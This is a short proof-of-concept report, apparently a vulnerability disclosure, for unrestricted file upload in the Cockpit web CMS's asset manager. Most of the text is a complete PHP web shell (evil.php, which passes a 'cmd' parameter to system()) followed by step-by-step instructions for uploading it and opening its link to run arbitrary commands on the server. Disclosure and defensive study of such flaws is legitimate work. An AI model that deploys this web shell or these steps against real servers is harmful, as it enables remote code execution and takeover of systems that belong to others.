There is no extension checks during file upload. Attacker may upload file to execute malicious code in the server.
Step 1: Create a file with the content below and save it as evil.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
</html>
Step 2: Login to the Cockpit web server
Step 3: Go to assets
Step 4: Upload Assets
Step 5: Upload the file that created.
Step 6: Copy asset link and paste it at a new tab.
Step 7: Able to execute any commands.